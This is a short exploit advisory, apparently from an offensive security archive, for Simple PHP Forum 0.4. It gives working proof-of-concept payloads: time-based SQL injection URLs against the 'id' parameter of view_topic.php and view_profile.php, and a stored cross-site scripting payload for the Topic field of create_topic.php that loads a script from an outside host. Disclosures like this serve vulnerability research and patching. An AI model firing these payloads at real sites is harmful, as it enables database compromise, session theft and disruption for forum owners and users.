26 lines
No EOL
962 B
Text
26 lines
No EOL
962 B
Text
# Author: loneferret of Offensive Security
|
|
# Product: sphpforum
|
|
# Version: 0.4 (older versions may be affected)
|
|
#
|
|
# Software Download: http://sourceforge.net/projects/sphpforum/
|
|
|
|
# Description:
|
|
# Simple PHP Forum is a PHP based forum/BBS board is designed to be small, simple,
|
|
# fast and allow easy integration into any existing web site.
|
|
|
|
# Vulnerability:
|
|
# Due to improper input sanitation, parameters are prone to SQL injection. Stored
|
|
# crossed site scripting is also present in some forms.
|
|
|
|
# PoC 1:
|
|
# SQL Injection
|
|
# Page: view_topic.php / view_profile.php?
|
|
# Vulnerable param: 'id'
|
|
# http://172.16.194.148/sphpforum/sphpforum-0.4/view_topic.php?id=50%27%20and%20sleep%2810%29%20and%20%271%27=%271
|
|
# http://172.16.194.148/sphpforum/sphpforum-0.4/view_profile.php?id=loneferret%27%20and%20sleep%2810%29%20and%20%271%27=%271
|
|
|
|
# PoC 2:
|
|
# Stored XSS
|
|
# Page: create_topic.php
|
|
# Vulnerable field: Topic
|
|
# Payload: <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> |